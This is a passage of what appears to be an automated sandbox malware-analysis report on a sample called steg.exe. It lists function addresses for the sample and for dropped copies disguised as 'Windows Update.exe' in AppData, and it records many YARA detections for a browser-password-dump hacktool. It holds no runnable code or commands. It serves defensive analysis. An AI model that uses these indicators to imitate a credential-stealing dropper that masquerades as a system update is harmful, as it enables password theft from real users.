                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FF80700_2_00FF8070
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F9B2E70_2_00F9B2E7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F9C2C70_2_00F9C2C7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F902870_2_00F90287
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F903970_2_00F90397
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FAC3870_2_00FAC387
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F9E3370_2_00F9E337
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FC64F70_2_00FC64F7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F9F4F70_2_00F9F4F7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FF75900_2_00FF7590
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FBA6E70_2_00FBA6E7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FAB6E70_2_00FAB6E7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FC46C70_2_00FC46C7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FC76270_2_00FC7627
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FF87EC0_2_00FF87EC
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FA27070_2_00FA2707
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FE49870_2_00FE4987
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_010798D10_2_010798D1
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FCFAC70_2_00FCFAC7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FE3A570_2_00FE3A57
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F8FA170_2_00F8FA17
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F8FB270_2_00F8FB27
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FF7B000_2_00FF7B00
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FA7C870_2_00FA7C87
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FD2C770_2_00FD2C77
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FCDC270_2_00FCDC27
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FDFD970_2_00FDFD97
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FF4D000_2_00FF4D00
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F93EC70_2_00F93EC7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00F8FFF70_2_00F8FFF7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FE7FC70_2_00FE7FC7
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FF9F2B0_2_00FF9F2B
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FB4F070_2_00FB4F07
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_03371E530_2_03371E53
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0006E0774_2_0006E077
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000880704_2_00088070
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000FD0AC4_2_000FD0AC
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000DB0DC4_2_000DB0DC
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000202874_2_00020287
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000C02CC4_2_000C02CC
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0002C2C74_2_0002C2C7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0002B2E74_2_0002B2E7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0002E3374_2_0002E337
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0003C3874_2_0003C387
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000203974_2_00020397
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000564F74_2_000564F7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0002F4F74_2_0002F4F7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000F950C4_2_000F950C
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000875904_2_00087590
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000F85DC4_2_000F85DC
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000576274_2_00057627
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000546C74_2_000546C7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0004A6E74_2_0004A6E7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0003B6E74_2_0003B6E7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000327074_2_00032707
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000887EC4_2_000887EC
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_001098D14_2_001098D1
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000749874_2_00074987
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0001FA174_2_0001FA17
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_00073A574_2_00073A57
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0005FAC74_2_0005FAC7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_00087B004_2_00087B00
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0001FB274_2_0001FB27
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_000F2BFC4_2_000F2BFC
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0005DC274_2_0005DC27
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_00062C774_2_00062C77
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_00037C874_2_00037C87
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_00084D004_2_00084D00
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0033807012_2_00338070
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0031E07712_2_0031E077
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_003AD0AC12_2_003AD0AC
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002D028712_2_002D0287
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002DB2E712_2_002DB2E7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002DC2C712_2_002DC2C7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002DE33712_2_002DE337
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002EC38712_2_002EC387
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002D039712_2_002D0397
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_003064F712_2_003064F7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002DF4F712_2_002DF4F7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0033759012_2_00337590
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0030762712_2_00307627
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002FA6E712_2_002FA6E7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002EB6E712_2_002EB6E7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_003046C712_2_003046C7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002E270712_2_002E2707
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_003387EC12_2_003387EC
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_003B98D112_2_003B98D1
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0032498712_2_00324987
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002CFA1712_2_002CFA17
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_00323A5712_2_00323A57
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0030FAC712_2_0030FAC7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002CFB2712_2_002CFB27
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_00337B0012_2_00337B00
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0030DC2712_2_0030DC27
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_00312C7712_2_00312C77
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002E7C8712_2_002E7C87
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_00334D0012_2_00334D00
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0031FD9712_2_0031FD97
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002D3EC712_2_002D3EC7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_00339F2B12_2_00339F2B
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002F4F0712_2_002F4F07
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_002CFFF712_2_002CFFF7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_00327FC712_2_00327FC7
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_04BA1E5312_2_04BA1E53
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B3807014_2_00B38070
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B1E07714_2_00B1E077
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AD028714_2_00AD0287
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00ADB2E714_2_00ADB2E7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00ADC2C714_2_00ADC2C7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AEC38714_2_00AEC387
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AD039714_2_00AD0397
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00ADE33714_2_00ADE337
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B064F714_2_00B064F7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00ADF4F714_2_00ADF4F7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B3759014_2_00B37590
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AFA6E714_2_00AFA6E7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AEB6E714_2_00AEB6E7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B0762714_2_00B07627
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B046C714_2_00B046C7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B0762714_2_00B07627
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B387EC14_2_00B387EC
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AE270714_2_00AE2707
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00BB98D114_2_00BB98D1
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B2498714_2_00B24987
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B0FAC714_2_00B0FAC7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00ACFA1714_2_00ACFA17
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B23A5714_2_00B23A57
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00ACFB2714_2_00ACFB27
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B37B0014_2_00B37B00
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AE7C8714_2_00AE7C87
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B0DC2714_2_00B0DC27
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B12C7714_2_00B12C77
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B1FD9714_2_00B1FD97
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B34D0014_2_00B34D00
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AD3EC714_2_00AD3EC7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00ACFFF714_2_00ACFFF7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B27FC714_2_00B27FC7
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B39F2B14_2_00B39F2B
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00AF4F0714_2_00AF4F07
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_053A5C1814_2_053A5C18
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_053A5C1314_2_053A5C13
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_053A1C6014_2_053A1C60
                                Source: steg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: steg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: steg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: Windows Update.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: Windows Update.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: Windows Update.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: WindowsUpdate.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: WindowsUpdate.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: WindowsUpdate.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: security.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: security.dllJump to behavior
                                Source: steg.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                Source: steg.exe, type: SAMPLEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.2.Windows Update.exe.9d97c.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.2.WindowsUpdate.exe.2cb377.2.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.1b377.2.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.0.WindowsUpdate.exe.2cb377.2.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.2.Windows Update.exe.1b377.2.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.acb377.8.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.2.Windows Update.exe.acb377.2.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.2.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.10000.9.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.b4d97c.4.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.acb377.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.1b377.4.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.9d97c.8.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.0.steg.exe.f8b377.2.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.0.steg.exe.100d97c.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.10000.6.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.1b377.11.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.b4d97c.11.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.b4d97c.2.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.0.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.2.Windows Update.exe.b4d97c.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.0.steg.exe.f80000.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.b4d97c.11.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.b4d97c.7.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.0.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.b4d97c.2.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.1.Windows Update.exe.1b377.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.1b377.7.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.b4d97c.7.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.9d97c.10.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
